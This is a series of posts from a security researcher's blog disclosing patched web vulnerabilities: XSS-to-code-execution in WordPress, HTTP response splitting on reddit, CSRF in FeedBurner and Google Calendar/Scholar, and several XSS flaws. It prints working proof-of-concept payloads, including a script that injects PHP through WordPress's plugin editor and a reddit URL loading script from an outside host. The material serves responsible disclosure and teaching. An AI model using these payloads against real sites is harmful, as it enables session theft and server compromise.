Tag: web application security
2011
01.31

Preface

Last year, I attended my first security conference: QuahogCon. I had never been to a conference before, but I had a great time listening to and learning from all the speakers. I especially enjoyed the opening keynote, which was given by Dan Kaminsky. The topic of the talk was “web defense”: the slides can be found here.

The talk covered a lot of ground, but one of the areas Dan touched on briefly was the Referer header. He reminded the audience that the Referer header is difficult to use as a security feature because it isn’t reliably passed to the server (due to filtering by proxies and other client software, browser-specific behaviors that control when referrer information is passed, etc). However, he also made the point that people are often warned to avoid using the header due to security concerns which are no longer valid. To quote the slides:

  • Many Content Management Systems have attempted to use Referer checking to stop XSRF and related attacks
  • We tell them not to do this, for “Security Reasons”

  • Amit et al fixed this years ago

  • There are no known mechanism for causing a browser to emit an arbitrary Referer header, and hasn’t been for quite some time.
    • More importantly, if one is found, it’s fixed, just like a whole host of other browser bugs

Despite its unreliable nature, the Referer header provides information that cannot be obtained from any other source: there is no other way for the server to know the page from which a request was submitted. As the rest of this post will illustrate, using the Referer header properly can partially mitigate the impact of a cross-site scripting attack; ignoring it can allow an attack to escalate and become much worse.

An Example

[Note: Although I’m sure people will use this post to argue that Wordpress is insecure, it’s worth noting that a similar proof of concept could be built against any web application that does not verify the Referer header as a form of CSRF protection. This kind of attack is in no way Wordpress specific.]

Wordpress makes extensive use of HttpOnly cookies, randomized nonces, and other security measures to protect itself against CSRF and session hijacking attacks. However, it is still possible for an attacker to sidestep all of those protections by making use of XMLHttpRequest, using GETs to retrieve nonces and POSTs to submit requests. Of course, XMLHttpRequest is meant to be able to make same-origin requests: there is nothing inherently wrong with that. Unfortunately, that behavior also poses a security risk: if an attacker can find and exploit an XSS vulnerability on the same domain as a Wordpress installation, that attacker can use XMLHttpRequest to make same-origin requests. That means an XSS vulnerability in any part of the system allows for a CSRF attack against the entire system.

People familiar with Wordpress may also realize that Wordpress administrators are given a wide range of abilities through the backend of their site. Those abilities include editing PHP files on the filesystem, assuming the files are writable by the web server. That won’t be true for all Wordpress installations, but there are many cases in which administrators may (intentionally or unintentionally) allow for such behavior. Although as of last year the file editor functionality can be disabled by defining a constant (DISALLOW_FILE_EDIT), Wordpress does not define this constant by default (see ticket #11306 and changeset 13034).

Now, let’s take a moment and summarize the ideas presented here so far:

  1. Given an XSS vulnerability, it’s possible for an attacker to make requests to Wordpress
  2. Administrators can edit files on the web server through a web interface

See where I’m going with this? ;-)

A Demonstration

Here’s a proof of concept that uses jQuery. One GET to grab the correct nonce and other fields from the plugin editor, one POST to append arbitrary code to a PHP file. Voila: an XSS vulnerability has become arbitrary code execution.

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
    <head>
        <meta http-equiv="Content-Type" content="text/html; charset=utf-8">

        <title>Wordpress XSS => Arbitrary Code / Command Execution PoC</title>
        <script type="text/javascript" src="http://www.google.com/jsapi"></script>

        <script type="text/javascript">
        var base = "/wordpress-3.0.3/wordpress";
        var code = "<?php /*code goes here */ ?>"

        google.load("jquery", "1.4.4");
        google.setOnLoadCallback(function() {
            $.get(base + '/wp-admin/plugin-editor.php?file=index.php', function (data) {
                var postData = $('#template', data).serialize();

                postData = postData.replace('&action=', encodeURIComponent(code) + '&action=');

                $.post(base + '/wp-admin/plugin-editor.php', postData);
            });
        });
        </script>
    </head>
    <body>
        <p>Hello!</p>
    </body>
</html>

This code (adapted somewhat) could be used in conjunction with any XSS vulnerability in Wordpress itself, or with an XSS vulnerability in any other application running on the same domain as a Wordpress installation.

In fact, users with the Editor role in Wordpress have the ability to use unfiltered HTML. They can perform an “XSS attack” against an administrator without any need for an underlying vulnerability. Of course, Wordpress administrators should only be giving editor privileges to people they feel they can trust. Then again, what happens if a hacker gains access to an editor’s account?

But how does the Referer help?

The example above relies on the fact that an attacker can use XMLHttpRequest to make valid requests to any page on the targeted server. Verifying the Referer header means that, if an XSS vulnerability exists on a given page, an attacker is limited to submitting requests that a user could normally submit from that page. For instance, if there were an XSS vulnerability in the comments section of a Wordpress site, an attacker would not be able to make POST requests to the plugin editor or to the user manager (to make themselves an administrator); they would be limited to actions like approving a comment, marking a comment as spam, and so on.

Of course, I don’t claim that checking the Referer mitigates XSS or CSRF vulnerabilities: at best, it limits the ways in which an XSS vulnerability can be used to cause a more serious security breach. XSS vulnerabilities in sensitive locations like file editors are still just as dangerous. And if you strictly enforce the policy, which you have to do if you want it to be effective, you’ll be locking out users who don’t send a Referer header.
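
For anyone wondering what such a check actually looks like, here is a minimal sketch of the idea. It is not Wordpress code, and the endpoint paths and the mapping below are made up purely for illustration; it just shows a server (written here as a small Node.js handler) rejecting state-changing requests whose Referer is missing or does not point at the page the action is normally submitted from.

// A minimal sketch (not Wordpress code) of Referer checking for state-changing
// requests. The endpoint-to-page mapping below is hypothetical.
var http = require('http');
var url = require('url');

// Hypothetical list of sensitive endpoints and the pages allowed to submit to them.
var allowedReferers = {
    '/wp-admin/plugin-editor.php': ['/wp-admin/plugin-editor.php'],
    '/wp-comments-post.php': ['/some-post/']
};

function refererAllowed(req) {
    var path = url.parse(req.url).pathname;
    var allowed = allowedReferers[path];
    if (!allowed) {
        return true; // not a sensitive endpoint
    }
    var referer = req.headers['referer'];
    if (!referer) {
        return false; // strict policy: no Referer, no state change
    }
    var parsed = url.parse(referer);
    // The Referer must point at our own host and at an expected page.
    return parsed.host === req.headers['host'] && allowed.indexOf(parsed.pathname) !== -1;
}

http.createServer(function (req, res) {
    if (req.method === 'POST' && !refererAllowed(req)) {
        res.writeHead(403);
        return res.end('Referer check failed');
    }
    res.writeHead(200);
    res.end('OK');
}).listen(8080);

With a policy like that in place, an XSS payload in the comments section could still POST to the comment-related endpoints, but its requests to the plugin editor would be rejected because their Referer would point at the wrong page.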

Final Thoughts

I’m far from the first person to notice that an XSS vulnerability can be used to bypass CSRF protections. For instance, Jesse Burns wrote a very thorough paper on CSRF back in 2005 that makes reference to the relationship between XSS and CSRF.

XSS flaws may allow bypassing of any of XSRF protections by leaking valid values of the tokens, allowing referrer’s to appear to be the application itself, or by hosting hostile HTML elements right in the target application.

As I mentioned earlier, Wordpress is not the only web application vulnerable to this kind of attack: any application that fails to validate the Referer header can fall victim to this type of vulnerability escalation. If people have other examples of applications where an XSS vulnerability can have extraordinary consequences, I’d be very interested to hear about them. :)

If you have any opinions, comments, or questions, please post them below!

Update: The comments have raised a couple interesting points.

  1. I’m not the only person to have run across this problem with Wordpress! ;-) In fact, commenter felixaime wrote a post (in French) about the same issue back in October.
  2. It turns out that it may be possible to “forge” the Referer header, to a degree. Commenter lava points out that by loading a page in an IFrame and using JavaScript to manipulate the contents of the page, it may be possible to bypass the kind of Referer checking I described. Definitely worth investigating!
2011
01.14

Summary

Reddit.com contained an HTTP response splitting vulnerability. As a result, it was possible to execute arbitrary JavaScript and HTML on the reddit.com domain.

What is HTTP Response Splitting?

From Wikipedia:

HTTP response splitting is a form of web application vulnerability, resulting from the failure of the application or its environment to properly sanitize input values. It can be used to perform cross-site scripting attacks, cross-user defacement, web cache poisoning, and similar exploits.

The attack consists of making the server print a carriage return (CR, ASCII 0x0D) line feed (LF, ASCII 0x0A) sequence followed by content supplied by the attacker in the header section of its response, typically by including them in input fields sent to the application. Per the HTTP standard (RFC 2616), headers are separated by one CRLF and the response’s headers are separated from its body by two. Therefore, the failure to remove CRs and LFs allows the attacker to set arbitrary headers, take control of the body, or break the response into two or more separate responses—hence the name.

The Web Application Security Consortium also has a good writeup, including sources with more details.

How Did The Vulnerability Work?

Reddit.com, like many sites on the Internet, has a redirect system built into its login functionality. If you’re viewing a page on reddit.com and choose to log in, the system will redirect you back to your original page afterward. The redirect functionality appears to be limited to pages on reddit.com and to reddit.com subdomains.

Under normal circumstances, a login URL with a redirect might look something like this:
http://reddit.com/login?dest=/r/reddit.com

If a user is already logged in, that URL will skip the login step and go straight to the redirection. The headers sent for that redirect look like this:

HTTP/1.1 302 Moved Temporarily  
Content-Type: text/html; charset=UTF-8  
Location: /r/reddit.com  
Pragma: no-cache  
Cache-Control: no-cache  
Content-Encoding: gzip  
Content-Length: 20  
Server: '; DROP TABLE servertypes; --  
Vary: Accept-Encoding  
Date: Fri, 14 Jan 2011 03:02:59 GMT  
Connection: keep-alive

Unfortunately, the vulnerability occurred because the “dest” parameter of the URL allowed an attacker to include newline characters (\r\n, or %0D%0A). Those characters were echoed back verbatim in the Location header, giving an attacker control over part of the HTTP response being sent by reddit’s servers.
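
To make the mechanics concrete, here is a minimal sketch of the vulnerable pattern and its fix. This is not reddit’s actual code (reddit is not written in Node.js); it just shows a redirect endpoint reflecting a dest parameter into the Location header, and the CR/LF stripping that keeps the value from spilling into new header lines.

// Illustrative only: a redirect endpoint that reflects ?dest= into the
// Location header. If the raw value is used, %0D%0A sequences in the URL
// become real CR/LF bytes in the header section of the response, letting an
// attacker append headers and a body of their choosing.
var http = require('http');
var url = require('url');

http.createServer(function (req, res) {
    var dest = url.parse(req.url, true).query.dest || '/';

    // The fix: strip (or reject) CR and LF before the value ever reaches a
    // header. Many modern frameworks now refuse such values automatically.
    var sanitized = dest.replace(/[\r\n]/g, '');

    res.writeHead(302, { 'Location': sanitized });
    res.end();
}).listen(8080);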

To illustrate the point, let’s take a look at one of the proofs of concept I developed to demonstrate the vulnerability.

The malicious URL we’re interested in is http://www.reddit.com/login?dest=http://reddit.com/%0D%0ALocation:%20javascript:%0D%0A%0D%0A<script>alert(document.cookie)</script>. Because of the newline characters included in the “dest” parameter, the response sent by reddit’s servers would now look something like this:

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html; charset=UTF-8
Location: /r/reddit.com
Location: javascript:

<script>alert(document.cookie)</script>
Pragma: no-cache
Cache-Control: no-cache
Content-Encoding: gzip
Content-Length: 20
Server: '; DROP TABLE servertypes; --
Vary: Accept-Encoding
Date: Fri, 14 Jan 2011 03:02:59 GMT
Connection: keep-alive

Two sets of newlines in a row (%0D%0A%0D%0A) indicate that the HTTP headers are finished and that the remainder of the response is the body. Normally, the body of a redirect response is never rendered: the browser follows the redirect before the body can be displayed. However, I used the second Location: header to confuse the browser, halting the redirect and causing it to display the body, which now contained the JavaScript I had injected.

Proof of Concepts

I developed a number of proof of concepts, since browser-specific behaviors heavily influenced whether a particular URL could trigger an XSS vulnerability in a particular browser.

  1. http://www.reddit.com/login?dest=http://reddit.com/%0D%0ALocation: javascript:%0D%0A%0D%0A<script>alert(document.cookie)</script>
    This proof of concept worked in Firefox only. Firefox halts the redirect and displays the body of the response if it encounters a second Location header containing something invalid (like a redirect to a JavaScript URI).
  2. http://www.reddit.com/login?dest=http://reddit.com/%00%0D%0A%0D%0A<script>alert(document.cookie)</script>
    This proof of concept worked in both Firefox and Chrome. Neither browser would follow the redirect when the Location header contained a null byte; both displayed the body of the response instead.
  3. http://www.reddit.com/login?dest=http://reddit.com/%00%0D%0A%0D%0A<script src="http://ha.ckers.org/xss.js"></script>
    This proof of concept worked in Safari only. It is similar to the second proof of concept, but it contains a different JavaScript payload: for some reason, Safari would not execute the JavaScript in the second proof of concept (I didn’t investigate the exact cause too much).

And of course, no XSS writeup would be complete without a picture. So, here’s a screenshot of the first proof of concept in action:

In Firefox 3.6.x, it was possible to trigger JavaScript by injecting a second, invalid Location header and a body containing <script> tags into the response.

In case anyone is curious, this vulnerability was patched within 48 hours of my original report.

Anything Else?

I want to thank reddit’s admins for supporting the responsible disclosure of security vulnerabilities. :-)

Also, if you have any questions about HTTP Response Splitting or other web application security vulnerabilities, feel free to leave them in the comments!

2011
01.10

Summary

Feedburner accounts were vulnerable to a CSRF attack against certain services (MyBrand and FeedBulletin). An attacker could cause a user to enable or disable these services (potentially disrupting end-user access to content, in the case of MyBrand).

How Did It Work?

This vulnerability was fairly straightforward. To activate/deactivate MyBrand/FeedBulletin, you sent a simple POST request (to http://feedburner.google.com/fb/a/mybrandSubmit for MyBrand and to http://feedburner.google.com/fb/a/feedbulletinSubmit for FeedBulletin). Neither of those requests required a CSRF token to be processed. Accordingly, an attacker could trick a user into submitting a request without their consent.

Consider a possible attack. The target, Alice, owns a blog located at AliceAppSec.org. Alice provides an RSS feed for her blog (http://feeds.aliceappsec.org/AliceAppSec) using FeedBurner’s MyBrand service. The attacker, Marvin, is a jealous competitor; he wants to disrupt Alice’s RSS feed. To do so, he crafts a page that automatically submits a malicious MyBrand-disabling POST request to FeedBurner. Once that’s done, all he needs to do is convince Alice to look at the page: if she’s signed in to FeedBurner, the POST request will disable MyBrand for her account, causing her feed to return a 404.
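
To make the attack concrete, here is a rough sketch of the kind of page Marvin could host. The field name and value below are hypothetical placeholders (the real proof of concept, linked below, used whatever parameters the FeedBurner form normally submits); the point is simply that a cross-site POST requires nothing more than an auto-submitting form, and the victim’s FeedBurner cookies ride along automatically.

// Hypothetical attack page: build a hidden form aimed at the MyBrand endpoint
// and submit it as soon as the page loads. The field name/value below are
// placeholders, not FeedBurner's real parameters.
window.addEventListener('load', function () {
    var form = document.createElement('form');
    form.method = 'POST';
    form.action = 'http://feedburner.google.com/fb/a/mybrandSubmit';

    var field = document.createElement('input');
    field.type = 'hidden';
    field.name = 'status';      // placeholder parameter name
    field.value = 'deactivate'; // placeholder value
    form.appendChild(field);

    document.body.appendChild(form);
    form.submit(); // the browser attaches Alice's FeedBurner session cookies
});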

Since the vulnerability is now patched, the proof of concept I sent to Google no longer functions. However, I’ve made the code (a simple HTML page) available for anyone who wants to check it out.

More Information

The vulnerability mentioned here has been confirmed patched by the Google Security Team. I owe them a ton of thanks for organizing this program and giving me a chance to improve my skills (and for responding to my many emails, even late at night on Sundays). :-)

Interested readers are encouraged to take a look at other vulnerabilities I’ve reported under Google’s Vulnerability Reward Program.

2010
12.31

Yesterday, I ran across a very interesting XSS vulnerability involving Flash embeds and Wordpress.com. The vulnerable code is now patched (even during the holidays, Automattic’s response time was stellar), so here are all the juicy details. ;-)

In the interest of security, Wordpress.com limits what HTML elements its users are allowed to post on their blogs. Anyone who’s interested can read about those limits on the Wordpress.com site. However, to allow users to embed different types of content (e.g. videos, music, etc.), Wordpress.com supports a series of “shortcodes.” These codes are typically created for trusted websites (e.g. YouTube) and allow users to embed content without using HTML directly.

It turns out that VodPod, one of the websites with a Wordpress.com shortcode, provides a way to embed third party content. It does so by generating a URL like http://widgets.vodpod.com/w/video_embed/ExternalVideo.12345, which returns a 301 redirect to your content hosted elsewhere. The Wordpress.com shortcode, when parsed, becomes an embed tag that uses the VodPod URL. Your browser will happily follow the redirect, allowing any SWF to be displayed within a Wordpress.com blog.

Now, under normal circumstances, that wouldn’t be a problem: these days, merely embedding a Flash applet on your page doesn’t cause security issues. However, there was a tiny issue with the HTML that Wordpress.com generated for embeds from VodPod. I’ve reproduced the bad embed code below:

<embed
src='http://widgets.vodpod.com/w/video_embed/ExternalVideo.12345'
type='application/x-shockwave-flash'
AllowScriptAccess='always'
pluginspage='http://www.macromedia.com/go/getflashplayer'
wmode='transparent'
flashvars='' width='425' height='350' />

The problem? The embed tag contained AllowScriptAccess='always'. According to Adobe’s documentation, that meant the embedded SWF could execute JavaScript in the context of the page it was being displayed on. Coupled with the ability to embed arbitrary SWFs from third parties, it made an XSS attack against Wordpress.com possible.

So, I shot off an email to Automattic’s security email address with the details: I received a reply very quickly and the vulnerability was patched (by changing the value for AllowScriptAccess to sameDomain) within a few hours. A very happy ending to this holiday tale. :)

2010
12.21

Summary

One page in Google’s Help Center was vulnerable to a reflected cross-site scripting attack.

How did it work?

The page in question contained the following snippet of JavaScript embedded within its HTML:

/*
function fileCartReport(form) {
    var comment = form.elements['body'].value;
    var entityStrEscaped = 'entity text';
    var entityStr = entityStrEscaped.replace(/&quot;/g, '"');
    var client = '0' * 1;
    cartReporter().fileCartReport(entityStr, getAbuseType(), comment, client, function () {
        form.submit();
    });
}
*/

function fileCartReport(form) {
    var entityStrEscaped = 'entity text';
    var entityStr = entityStrEscaped.replace(/&quot;/g, '"')
    var report = {
        entityId: entityStr,
        abuseCategory: getAbuseType(),
        comment: form.elements['body'].value,
        applicationId: '0' * 1,
        language: 'en'
    }
    cartReporter().fileCartReport(report, function () {
        form.submit();
    });
}

In the real code, the string entity text was actually the value of a parameter named entity passed in the URL. In normal links to the page, the entity parameter was a JSON-encoded string, which the rest of the JavaScript would then submit back to Google. However, since the data was being passed in the URL, it was possible to change the value placed in the JavaScript.

Of course, the value wasn’t fully under my control: for instance, there was still some input escaping that turned single quotes and double quotes into HTML entities. As a result, I couldn’t find a way to inject arbitrary JavaScript into the uncommented function. However, I realized that it was possible to inject JavaScript into the commented-out function: all I needed to do was begin my payload with */ and end it with /*, preserving the existing block comment. At that point, I could write just about any JavaScript I wanted in the middle (keeping in mind the restrictions imposed by input escaping).
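
To make that concrete, here is roughly what the top of the script would look like after requesting the page with an illustrative entity value of */ alert(document.cookie); /* (note that the payload needs no quote characters, which matters given the input escaping):

/*
function fileCartReport(form) {
    var comment = form.elements['body'].value;
    var entityStrEscaped = '*/ alert(document.cookie); /*';
    var entityStr = entityStrEscaped.replace(/&quot;/g, '"');
    var client = '0' * 1;
    cartReporter().fileCartReport(entityStr, getAbuseType(), comment, client, function () {
        form.submit();
    });
}
*/

The injected */ terminates the block comment that opens the snippet, alert(document.cookie); then runs as top-level code, and the trailing /* starts a new comment that is closed by the original */ at the end of the commented-out function, so the rest of the script still parses.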

The vulnerability in action

I remembered to grab a screenshot of the vulnerability as I was testing for it, and I’ve reproduced it below:

The XSS vulnerability in action (in Google Chrome)

More Information

The vulnerability mentioned here has been confirmed patched by the Google Security Team. I owe them a ton of thanks for organizing this program and giving me a chance to improve my skills. :-)

Interested readers are encouraged to take a look at other vulnerabilities I’ve reported under Google’s Vulnerability Reward Program.

2010
12.17

Over the past several weeks, I’ve been an active participant in Google’s Web Vulnerability Reward Program. I’ve been writing blog posts about each of the vulnerabilities I’ve reported, publishing them once I’m told that the vulnerability has been patched. I’ve also been keeping up with posts that others have written and submitted to places like /r/netsec, /r/xss, and Hacker News. The posts, in aggregate, have explored many areas of web application security: XSS attacks of varying design, CSRF vulnerabilities, HTTP response splitting, clickjacking, etc. However, the program has attracted quite a large number of participants; I’m sure that I’ve seen only a small fraction of what people have posted.

Thus, the idea for this post came into being. My intention is to find and link to reports that people have written about vulnerabilities found as a part of this program. I’ve done a bit of searching and compiled a few links to start with (I’ve ordered them by the date they were posted). If anyone has suggestions for links to add, post in the comments and let me know: I’ll update the post with them.

Each entry below lists the report title, the site where it was posted, a short summary, and the date it was posted.
Google Calendar CSRF
https://nealpoole.com/blog/
Google Calendar was vulnerable to a series of CSRF vulnerabilities. In at least two separate instances, existing countermeasures (CSRF tokens) were not being validated by the application. 2010-11-30
Google.com XSS / HTML Code Injection
http://tinkode27.baywords.com/
Google Maps contained an XSS vulnerability in its “Change default location” feature. The “HTML Code Injection” vulnerability referenced is not a bug: Google Translate has its content properly sandboxed (as the post indicates), mitigating the effects of any vulnerability. 2010-12-01
Google Scholar CSRF
https://nealpoole.com/blog/
Google Scholar was vulnerable to minor but potentially annoying CSRF vulnerabilities in two different pages. The regular search equivalents of both of these pages used CSRF tokens to mitigate these problems. 2010-12-07
Google.com XSS / Google Spreadsheets Clickjacking
http://securitylab.ru/
[English]
Google.com was vulnerable to an XSS attack (the exact details are unclear). It also appears that it was possible to perform a clickjacking attack using a Google Spreadsheet. 2010-12-08
Google XSS Flaw in Website Optimizer Scripts explained
http://www.acunetix.com/blog/web-security-zone/
Google’s Website Optimizer produced “control scripts” that caused websites to become vulnerable to XSS attacks. The attack required that the site already be vulnerable to a cookie injection vulnerability (discussed in more detail in the comments). 2010-12-09
Finding security issues in a website (or: How to get paid by Google)
http://adblockplus.org/blog/
Four different vulnerabilities: one basic XSS in YouTube Help, one XSS in onclick attributes, one HTTP Response Splitting vulnerability, and one last XSS in a tooltips script for Website Optimizer. 2010-12-11
Gmail+Google Chrome XSS Vulnerability
http://spareclockcycles.org/
Gmail contained an XSS vulnerability in the way it handled attachment names in Google Chrome. 2010-12-14
XSS in YouTube
http://www.ebanyu.com.ar/
[English]
YouTube’s inbox allowed an attacker to turn a JSON response into an XSS vector. The attacker needed to know the target’s session token in order to exploit the vulnerability. 2010-12-14
New Google Groups, Non-Persistent XSS
https://nealpoole.com/blog/
The new Google Groups interface contained an XSS vulnerability in its search functionality. The vulnerability required some user interaction to be activated. 2010-12-17
DoubleClick HTTP Header Injection / XSS
http://www.cloudscan.me/
The Doubleclick Ad CDN was vulnerable to HTTP Header Injection and cross site scripting attacks. 2010-12-21
XSS in Google Support Contact Form
https://nealpoole.com/blog/
One page in Google’s Help Center was vulnerable to a reflected cross-site scripting attack. 2010-12-21
Security Token Prediction in Google Scholar Alerts
http://www.garage4hackers.com/
Google Scholar’s Alerts feature used predictable security tokens in its URLs. This weakness allowed an attacker to create / list / delete alerts on behalf of other users. 2011-01-05
XSS in Google Shopping, Maps and Blogs
http://apoup.blogspot.com/
Google Shopping, Google Maps, and Google Blog Search were vulnerable to an unspecified cross-site scripting attack. There are more details available on the reporter’s blog (in the original Japanese and in English). 2011-01-27
XSS Vulnerability in Google Code Static HTML
https://nealpoole.com/blog/
Google Code contained a static HTML page that was vulnerable to a reflected, DOM-based XSS vulnerability. 2011-02-01
XSS in Google Analytics via Event Tracking API
http://spareclockcycles.org/
Google Analytics was vulnerable to a persistent XSS attack. A malicious attacker could generate fake events containing malicious HTML that would be executed on the Analytics dashboard. 2011-02-03
Non-Persistent XSS in Aardvark
https://nealpoole.com/blog/
Aardvark contained several reflected, DOM based XSS vulnerabilities. Due to CSRF protections, exploiting these vulnerabilities remotely was non-trivial. 2011-02-03
Persistent XSS in Google Baraza / Ejabat
https://nealpoole.com/blog/
Google Baraza (www.google.com/baraza/) and Google Ejabat (ejabat.google.com) were vulnerable to a persistent XSS attack. A malicious user could create a post that would trigger JavaScript when an image or link was clicked on. 2011-02-03
Persistent XSS in Blogger Design Preview
https://nealpoole.com/blog/
Blogger’s Design Preview functionality served up author-generated content in the context of blogger.com, allowing an author to perform an XSS attack against a blog administrator. 2011-02-03
Multiple Vulnerabilities in Google Applications
http://d.hatena.ne.jp/masatokinugawa/
[English]
The post covers three different types of vulnerabilities that the author came across. 2011-02-07
Persistent XSS in Google Finance
http://benhayak.blogspot.com/
Google Finance did not properly escape the names of user-created portfolios when using them in JavaScript. As a result, it was possible to craft a name that would cause XSS. 2011-02-16
Persistent XSS in Google Website Optimizer
http://benhayak.blogspot.com/
By using javascript: URIs in place of regular URLs when creating an experiment, the author of the post was able to craft a persistent XSS attack. 2011-02-27
Reflected MHTML Injection in Google Support (mail.google.com)
http://www.wooyun.org/ [English]
It was possible to inject a valid MHTML document into a support page hosted on mail.google.com. As a result, IE users who browsed to a malicious URL using the mhtml protocol handler could have triggered an XSS attack. 2011-03-03
How I Almost Won Pwn2Own via XSS
http://jon.oberheide.org/blog/
The Android Market was vulnerable to an XSS attack due to a lack of output sanitization. Due to how the Android platform works, the vulnerability could have been used to download and execute arbitrary code on phones. 2011-03-07
Gaining Administrative Privileges on any Blogger.com Account
http://www.nirgoldshlager.com/
Blogger was vulnerable to an HTTP Parameter Pollution vulnerability. By providing the blogID twice in the request (once with a blogID controlled by the attacker and once with a blogID controlled by the victim), it was possible to make requests on behalf of a blog that the attacker was not authorized to manage. 2011-03-10
Reflected XSS in mail.google.com
http://www.cloudscan.me/
Gmail did not properly sanitize input provided by the user in the URL and the cookie. As a result, it was vulnerable to several reflected cross-site scripting attacks. 2011-03-30

Let me know what you think in the comments!

Update (12/21/2010): The comments have spoken and I’ve added a new vulnerability to the list.

Update 2 (12/21/2010): Adding another vulnerability that I reported to the list.

Update 3 (1/6/2011): fb1h2s emailed me about a vulnerability he reported. It has been added to the end of the list.

Update 4 (1/27/2011): We have another vulnerability report submitted via the comments.

Update 5 (2/3/2011): Five new reports have been added to the list, all of them XSS vulnerabilities!

Update 6 (3/4/2011): Three new reports have been added to the list.

Update 7 (3/7/2011): Added a cool new report about an XSS vulnerability in the Android Market.

Update 8 (3/10/2011): Nir Goldshlager has written in with a link to his first report, an authentication bypass / HTTP Parameter Pollution vulnerability in Blogger.

Update 9 (3/30/2011): New Gmail XSS. Super happy fun time.

2010
12.17

Summary

The new Google Groups interface contained an XSS vulnerability in its search functionality. The vulnerability required some user interaction to be activated.

How Did It Work?

The search box at the top of the new interface is designed to provide some type-ahead functionality: as the user types, his/her input is scanned and used to create a drop down menu of choices. Unfortunately, user input was not properly sanitized; for instance, typing <u> into the search box caused drop down menu items to become underlined. As a result of this oversight, it was possible to type arbitrary HTML/JavaScript into the search box and have it executed by the page.

The new interface’s type-ahead functionality, hard at work

My next step was to find a way to pass a malicious search string to a user. As it turned out, the interface provided a way to link to search results: visiting https://groups.google.com/forum/?fromgroups#!searchin/googlegroups-announce/<script>alert(document.cookie)<%2Fscript> would put <script>alert(document.cookie)</script> into the user’s search box.

Executing that malicious string required a little user interaction, however. The drop down box (and accordingly, the XSS) would only be activated when the user interacted with the search field. It was possible for a user to avoid the XSS by clicking in the box, highlighting the text, and deleting the entire string (or changing a character in the string so that the script failed to run). However, any other kind of interaction would have triggered the script’s execution.
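
The underlying mistake is a common one for type-ahead widgets: the typed query is dropped into the suggestion markup as HTML rather than as text. Here is a minimal sketch of the difference; this is not Google’s code, just the general pattern.

// Illustrative only: rendering a type-ahead suggestion from raw user input.
function renderSuggestion(listElement, userInput) {
    var item = document.createElement('li');

    // Vulnerable pattern: the query is parsed as HTML, so markup in it (for
    // example an <img> tag with an onerror handler) runs in the page.
    // item.innerHTML = 'Search for: ' + userInput;

    // Safer pattern: insert the query as plain text so tags are displayed
    // rather than interpreted.
    item.textContent = 'Search for: ' + userInput;

    listElement.appendChild(item);
}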

More Information

The vulnerability mentioned here has been confirmed patched by the Google Security Team. I owe them a ton of thanks for organizing this program and giving me a chance to improve my skills. :-)

Interested readers are encouraged to take a look at other vulnerabilities I’ve reported under Google’s Vulnerability Reward Program.

2010
12.07

Summary

Google Scholar was vulnerable to minor but potentially annoying CSRF vulnerabilities in two different pages. The regular search equivalents of both of these pages used CSRF tokens to mitigate these problems.

Vulnerability #1

There was no CSRF protection used when saving preferences in Google Scholar. So, browsing to the following URL used to set your language on Google Scholar to Arabic and set your search results to return papers written in Chinese: http://scholar.google.com/scholar_setprefs?hl=ar&lang=some&lr=lang_zh-CN&submit. As of right now, the URL no longer updates user preferences (although it does change the language for the current page and any page accessed from links/forms off of that page).

Vulnerability #2

There was no CSRF check in place for setting up email alerts in Google Scholar. A simple POST to http://scholar.google.com/scholar_alerts?view_op=list_alerts&hl=en where the POST data was

alert_query=[SOME QUERY]&
alert_max_results=10&
create_alert_btn=Create+alert

would have resulted in an alert being created for the currently logged in user (there was a parameter, email_for_op, that was passed in during a real request: removing it seemed to cause the system to default to the currently logged in user’s email address).

More Information

The vulnerabilities mentioned here have all been confirmed patched by the Google Security Team. I owe them a ton of thanks for organizing this program and giving me a chance to improve my skills. :-)

To see more posts I’ve written about vulnerabilities reported under Google’s Vulnerability Reward Program, please click here.

2010
11.30

Summary

Google Calendar contained a series of CSRF vulnerabilities. In two separate instances, I found that existing countermeasures (CSRF tokens) were not being validated by the application.

Walkthroughs

Example #1

In the first instance, I found it was possible to add an arbitrary event to a user’s calendar. I used Google Calendar’s “quick add” feature: it allows users to click on a space on the calendar and type in the name of an event, which adds it to the calendar. By monitoring the HTTP traffic between my browser and Google, I determined that the calendar entry was being created by a GET request that looked something like this (I’ve broken up the URL for the sake of readability):

http://www.google.com/calendar/event?
dates=20101103T003000%2F20101103T013000
&text=asfsaf
&pprop=HowCreated%3ADRAG
&src=kmVhbF9wb29sLUBicm93bi5lZGU
&ctz=America%2FNew_York
&eid=1288669371381
&sf=true
&action=CREATE
&output=js
&lef=LHZkMjYxNDNmODNlOTBlbnZqMTQ0amh1Ym9AZ3JvdXAuY2FsZW5kYXIuZ29vZ2xlLmNvbQ
&lef=MW4udXNhI2hvbGlkYXlAZ3JvdXVudi5jYWxlbmRhci5nb29nbGUuY29t
&lef=bsVhbF9wb21sZUBicm92bi5lZHU
&droi=20101024T000000%2F20101212T000000
&secid=-_1FyItA6aDLfYZl6GhuK62s74o

The first thing I tried was removing the secid parameter (which I assumed to be a CSRF token): surprisingly, while the output of the response changed slightly, the request still created a new event on the calendar. I then experimented, through trial and error, with removing more parameters until I got the URL down to the following:

http://www.google.com/calendar/event?
dates=20101103T003000%2F20101103T013000
&text=asfsaf
&sf=true
&action=CREATE

An attacker could have provided that URL to a target in any number of ways: just visiting it would have added a corresponding entry to the target’s calendar.
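
Since the stripped-down request is a plain GET with no secret values, delivery is trivial: any page the victim views can issue it on their behalf. Here is a sketch of one delivery method (the event text is arbitrary):

// Any page the victim loads can fire the request; an image element works, and
// the browser sends the victim's Google cookies along with it.
var img = document.createElement('img');
img.src = 'http://www.google.com/calendar/event' +
    '?dates=20101103T003000%2F20101103T013000' +
    '&text=' + encodeURIComponent('Attacker-chosen event') +
    '&sf=true' +
    '&action=CREATE';
document.body.appendChild(img);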

Example #2

The second instance involved changing the privacy settings of an existing calendar. To do so, an attacker first needed to determine the calendar’s unique identifier. I proposed the following method for finding such an identifier, assuming the target is a Gmail user (and we’re interested in their default, personal calendar):

  1. Identify the target. Let’s say the target is example@gmail.com.
  2. Register a Gmail account where the first letter of the account is different from the target’s. So, here, I might register fxample@gmail.com
  3. Sign in to Google Calendar as the attacker and take a look at the printable image version of your calendar. It will have the attacker’s email address in the upper left hand corner. The URL for the image looks something like this (I’ve omitted unnecessary parameters): https://www.google.com/calendar/printable?src=[SOME STR]&psdec=true&pft=png
